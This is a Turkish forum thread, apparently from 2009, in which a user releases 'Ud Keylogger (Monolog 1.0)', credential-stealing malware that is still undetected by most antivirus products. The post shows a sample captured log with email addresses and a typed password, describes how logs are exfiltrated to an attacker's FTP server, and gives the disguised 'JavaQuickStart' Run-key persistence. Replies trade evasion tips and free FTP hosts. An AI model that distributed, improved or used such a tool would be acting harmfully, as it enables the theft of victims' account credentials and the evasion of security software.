Ud Keylogger (Monolog 1.0)
-
sonunda bitti totalvirusde 3 anti yakalıyor onlarda sık kullanılan antiler değil.
örnek bir log
[TARIH/SAAT]: 2009.12.04 01:59:32 [KULLANICI ADI: monoton]
[MSN USER: .]
[MSN USER: ..]
[MSN USER: activesharingfolder.dat]
[MSN USER: Brands]
[MSN USER: mail@hotmail.com]
[MSN USER: mail2@hotmail.com]
[PENCERE: Windows Live Messenger]
maİl3@hotmaİl.com[TAB]sİfre[ENTER][PENCERE: Yeni Metin Belgesi.txt - Not Defteri]
dzfgfdgzdgfprogramın kullanımı çok basit ilk açıldığında ftp adres kullanıcı adı şifre giriyoruz aynı dizine Logger.exe adında dosya oluşturuyor.
eğer Logger.exe yi yalnışlıkla çalıştırırsanız yada deneme amaçlı silmek için
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
klasorundeki "JavaQuickStart" anahtarını system32 den jqs.exe yi silersiniz.
link
-
virustotalde tarattıysan bi zaman sonra kullanmasan bile 2-3 den fazla anti tanıyacaktır hocam :)
-
Ud Keylogger (MonoLog 1.0 [ :) ] yasaktı kanımca.
+ vt de tarattıysan git o keylogger artık pert ;)
-
Metanet bunu yazdı:
-----------------------------
virustotalde tarattıysan bi zaman sonra kullanmasan bile 2-3 den fazla anti tanıyacaktır hocam :)
-----------------------------
haklısın hocam dün gece tarattım 1anti yakalıyordu bugun 3 oldu acemilik işte :(. -
bedava ftp söylede bir deniyeyim bulamadim :)
-
siganfu bunu yazdı:
-----------------------------
bedava ftp söylede bir deniyeyim bulamadim :)
-----------------------------
justfree.com ben kullanıyorum 1 haftadır şimdilik sorun yok. -
Demekki neymiş bi kaç haftaya kalmaz U.D özelliği kalmıcakmış :)
-
indiripte deneyen varsa hangi antiler uyarı veriyor,vermiyor onuda yazarsanız ona göre güncelleme yapabilirim
aviradan sugibi geçiyo :)
eğer kendi bilgisayarınızda test edicekseniz Logger.exe çalıştırın q_q ile başlayan dosya oluşturur daha önceden dosya varsa upload eder siler edemezse sonraki oturumda dener dosyalar q_q ile başlar diğer parametreleri saat ve tarih.
-
ftp adres yerine ne yazcaz sadece site isminimi yoksa mesela http:// siteadresi com/forumnewmessage.asp?folderid=99945 index.html nin bulundugu adresimi ?
-
ahMETaLy bunu yazdı:
-----------------------------
ftp adres yerine ne yazcaz sadece site isminimi yoksa mesela http:// siteadresi com/forumnewmessage.asp?folderid=99945 index.html nin bulundugu adresimi ?
-----------------------------
ftp.adres -
kendi pcmde ve ftp'imde denedim.. Calişmiyor.. FTP'ne loglar gelmiyor. ?